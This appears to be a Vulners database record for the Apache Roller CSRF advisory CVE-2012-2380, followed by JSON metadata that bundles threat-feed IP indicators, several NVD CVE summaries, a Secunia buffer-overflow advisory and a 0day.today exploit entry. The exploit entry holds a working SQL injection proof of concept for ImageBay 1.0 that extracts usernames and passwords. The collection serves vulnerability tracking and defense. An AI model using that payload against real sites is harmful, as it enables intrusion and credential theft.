ID SECURITYVULNS:DOC:28260 Type securityvulns Reporter Securityvulns Modified 2012-07-09T00:00:00
Description
Severity: important
Vendor: The Apache Software Foundation
Versions Affected:
Roller 4.0.0 to Roller 4.0.1
Roller 5.0
The unsupported Roller 3.1 release is also affected
Description:
HTTP POST interfaces in the Roller admin/editor console were not
protected from CSRF attacks. This issue has been fixed by requiring a
valid per user and per session "salt" value in all HTTP POST requests.
Mitigation
Roller 4.0 and 4.0.1 users should upgrade to Roller 5.0.1
Roller 5.0 users should upgrade to Roller 5.0.1
Roller 3.1 users should upgrade to Roller 5.0.1
Credit:
This issue was discovered by Jun Zhu, PhD student, University of North
Carolina, Charlotte
{"id": "SECURITYVULNS:DOC:28260", "bulletinFamily": "software", "title": "CVE-2012-2380: Apache Roller Cross-Site-Resource-Forgery (XSRF) vulnerability", "description": "Severity: important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\nRoller 4.0.0 to Roller 4.0.1\r\nRoller 5.0\r\nThe unsupported Roller 3.1 release is also affected\r\n\r\nDescription:\r\nHTTP POST interfaces in the Roller admin/editor console were not\r\nprotected from CSRF attacks. This issue has been fixed by requiring a\r\nvalid per user and per session "salt" value in all HTTP POST requests.\r\n\r\nMitigation\r\nRoller 4.0 and 4.0.1 users should upgrade to Roller 5.0.1\r\nRoller 5.0 users should upgrade to Roller 5.0.1\r\nRoller 3.1 users should upgrade to Roller 5.0.1\r\n\r\nCredit:\r\nThis issue was discovered by Jun Zhu, PhD student, University of North\r\nCarolina, Charlotte\r\n", "published": "2012-07-09T00:00:00", "modified": "2012-07-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28260", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:45", "edition": 1, "viewCount": 4, "enchantments": {"score": {"value": 2.2, "vector": "NONE", "modified": "2018-08-31T11:10:45", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562311220201590", "OPENVAS:1361412562311220201591", "OPENVAS:1361412562311220201615"]}, {"type": "nessus", "idList": ["NEWSTART_CGSL_NS-SA-2020-0027_CHRONY.NASL", "EULEROS_SA-2020-1590.NASL", "EULEROS_SA-2020-1591.NASL", "ALA_ALAS-2020-1364.NASL", "EULEROS_SA-2020-1615.NASL"]}, {"type": "securelist", "idList": ["SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7"]}, {"type": "mskb", "idList": ["KB2647516", "KB2979597", "KB2559049", "KB2842632", "KB2586448", "KB2496326", "KB980195"]}, {"type": "github", "idList": ["GHSA-R854-96GQ-RFG3"]}, {"type": "amazon", "idList": ["ALAS-2020-1364"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/SALTSTACK_SALT_ROOT_KEY"]}, {"type": "thn", "idList": ["THN:9F1824BD0EEB6A1695B53AE380D04BF9"]}], "modified": "2018-08-31T11:10:45", "rev": 2}, "vulnersScore": 2.2}, "affectedSoftware": []}
{"rst": [{"lastseen": "2021-01-19T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]16.255.199** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **2**.\n First seen: 2020-03-05T03:00:00, Last seen: 2021-01-19T03:00:00.\n IOC tags: **generic**.\nASN 28260: (First IP 187.16.254.0, Last IP 187.16.255.255).\nASN Name \"ALTA\" and Organisation \"REDE CORPORATE NETWORK TELECOM LTDA EPP\".\nASN hosts 16 domains.\nGEO IP information: City \"Angra dos Reis\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-03-05T00:00:00", "id": "RST:200F66A0-F6F9-3ADF-B76B-8D95F8EBAC08", "href": "", "published": "2021-01-20T00:00:00", "title": "RST Threat feed. IOC: 187.16.255.199", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]95.34.16** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **36**.\n First seen: 2021-01-01T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **shellprobe**.\nASN 28260: (First IP 187.95.32.0, Last IP 187.95.34.255).\nASN Name \"ALTA\" and Organisation \"REDE CORPORATE NETWORK TELECOM LTDA EPP\".\nASN hosts 16 domains.\nGEO IP information: City \"Nova Iguau\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-01T00:00:00", "id": "RST:67DED3A0-7173-3579-A68D-6729A3465FCC", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: 187.95.34.16", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-05T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]16.246.6** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-01-05T03:00:00, Last seen: 2021-01-05T03:00:00.\n IOC tags: **generic**.\nASN 28260: (First IP 187.16.240.0, Last IP 187.16.253.255).\nASN Name \"ALTA\" and Organisation \"REDE CORPORATE NETWORK TELECOM LTDA EPP\".\nASN hosts 16 domains.\nGEO IP information: City \"Angra dos Reis\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-05T00:00:00", "id": "RST:E2FBBA97-8607-3DFD-B470-4B039ABCD587", "href": "", "published": "2021-01-05T00:00:00", "title": "RST Threat feed. IOC: 187.16.246.6", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-05T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]16.250.74** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-01-05T03:00:00, Last seen: 2021-01-05T03:00:00.\n IOC tags: **generic**.\nASN 28260: (First IP 187.16.240.0, Last IP 187.16.253.255).\nASN Name \"ALTA\" and Organisation \"REDE CORPORATE NETWORK TELECOM LTDA EPP\".\nASN hosts 16 domains.\nGEO IP information: City \"Nova Friburgo\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-05T00:00:00", "id": "RST:3B313C22-40D4-3441-8C24-8631256A190E", "href": "", "published": "2021-01-05T00:00:00", "title": "RST Threat feed. IOC: 187.16.250.74", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]16.255.154** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-12-06T03:00:00, Last seen: 2020-12-06T03:00:00.\n IOC tags: **generic**.\nASN 28260: (First IP 187.16.254.0, Last IP 187.16.255.255).\nASN Name \"ALTA\" and Organisation \"REDE CORPORATE NETWORK TELECOM LTDA EPP\".\nASN hosts 16 domains.\nGEO IP information: City \"Angra dos Reis\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-06T00:00:00", "id": "RST:0C2CAC08-74A7-3E13-8E5D-F09D23B45AB8", "href": "", "published": "2020-12-06T00:00:00", "title": "RST Threat feed. IOC: 187.16.255.154", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]16.240.162** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-12-06T03:00:00, Last seen: 2020-12-06T03:00:00.\n IOC tags: **generic**.\nASN 28260: (First IP 187.16.240.0, Last IP 187.16.253.255).\nASN Name \"ALTA\" and Organisation \"REDE CORPORATE NETWORK TELECOM LTDA EPP\".\nASN hosts 16 domains.\nGEO IP information: City \"Teresopolis\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-06T00:00:00", "id": "RST:85D3B305-321F-374C-BA52-26C2845152BB", "href": "", "published": "2020-12-06T00:00:00", "title": "RST Threat feed. IOC: 187.16.240.162", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]16.246.138** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2020-12-03T03:00:00, Last seen: 2020-12-03T03:00:00.\n IOC tags: **generic**.\nASN 28260: (First IP 187.16.240.0, Last IP 187.16.253.255).\nASN Name \"ALTA\" and Organisation \"REDE CORPORATE NETWORK TELECOM LTDA EPP\".\nASN hosts 16 domains.\nGEO IP information: City \"Angra dos Reis\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-03T00:00:00", "id": "RST:83BC141D-34AD-3A15-BC79-17092EAC089E", "href": "", "published": "2020-12-03T00:00:00", "title": "RST Threat feed. IOC: 187.16.246.138", "type": "rst", "cvss": {}}, {"lastseen": "2020-10-13T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]16.255.102** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **17**.\n First seen: 2020-08-06T03:00:00, Last seen: 2020-10-13T03:00:00.\n IOC tags: **generic**.\nASN 28260: (First IP 187.16.254.0, Last IP 187.16.255.255).\nASN Name \"ALTA\" and Organisation \"REDE CORPORATE NETWORK TELECOM LTDA EPP\".\nASN hosts 13 domains.\nGEO IP information: City \"Angra dos Reis\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-06T00:00:00", "id": "RST:EA0FDFC5-9AD9-37B2-AF4F-9BB1672975DA", "href": "", "published": "2020-10-14T00:00:00", "title": "RST Threat feed. IOC: 187.16.255.102", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]16.255.73** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **26**.\n First seen: 2020-08-25T03:00:00, Last seen: 2020-09-23T03:00:00.\n IOC tags: **shellprobe**.\nASN 28260: (First IP 187.16.254.0, Last IP 187.16.255.255).\nASN Name \"ALTA\" and Organisation \"REDE CORPORATE NETWORK TELECOM LTDA EPP\".\nASN hosts 13 domains.\nGEO IP information: City \"Angra dos Reis\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-25T00:00:00", "id": "RST:68CB3D9B-FDA4-3325-BA84-0F001EEA2CCB", "href": "", "published": "2020-09-24T00:00:00", "title": "RST Threat feed. IOC: 187.16.255.73", "type": "rst", "cvss": {}}, {"lastseen": "2020-08-12T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **177[.]130.2.180** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **21**.\n First seen: 2020-06-24T03:00:00, Last seen: 2020-08-12T03:00:00.\n IOC tags: **generic**.\nASN 28260: (First IP 177.130.0.0, Last IP 177.130.3.255).\nASN Name \"ALTA\" and Organisation \"REDE CORPORATE NETWORK TELECOM LTDA EPP\".\nASN hosts 13 domains.\nGEO IP information: City \"Petrpolis\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-24T00:00:00", "id": "RST:72806489-A5E6-32DB-80DE-8BBD2FFF8365", "href": "", "published": "2020-09-21T00:00:00", "title": "RST Threat feed. IOC: 177.130.2.180", "type": "rst", "cvss": {}}], "cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T21:41:56", "description": "An Integer Signedness issue (for a return code) in the res_pjsip_sdp_rtp module in Digium Asterisk versions 15.7.1 and earlier and 16.1.1 and earlier allows remote authenticated users to crash Asterisk via a specially crafted SDP protocol violation.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-03-28T17:29:00", "title": "CVE-2019-7251", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7251"], "modified": "2019-04-01T18:14:00", "cpe": [], "id": "CVE-2019-7251", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7251", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": []}], "zdt": [{"lastseen": "2018-01-02T01:08:44", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2017-08-10T00:00:00", "type": "zdt", "title": "ImageBay 1.0 - SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-08-10T00:00:00", "href": "https://0day.today/exploit/description/28260", "id": "1337DAY-ID-28260", "sourceData": "# # # # #\r\n# Exploit Title: ImageBay 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 10.08.2017\r\n# Vendor Homepage : http://www.scriptfolder.com/\r\n# Software Link: http://www.scriptfolder.com/imagebay-publish-or-share-photography-and-pictures/\r\n# Demo: http://imagebay.scriptfolder.com/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n#\r\n# Proof of Concept:\r\n# http://localhost/[PATH]/picture.php?pid=[SQL]\r\n# -22++/*!11111union*/+/*!11111select*/+/*!11111concat*/(username,0x3a,password),0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232+from+users--+-\r\n# http://localhost/[PATH]/updaterate.php?id=[SQL]\r\n# Etc...\r\n# # # # #\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/28260", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}]}
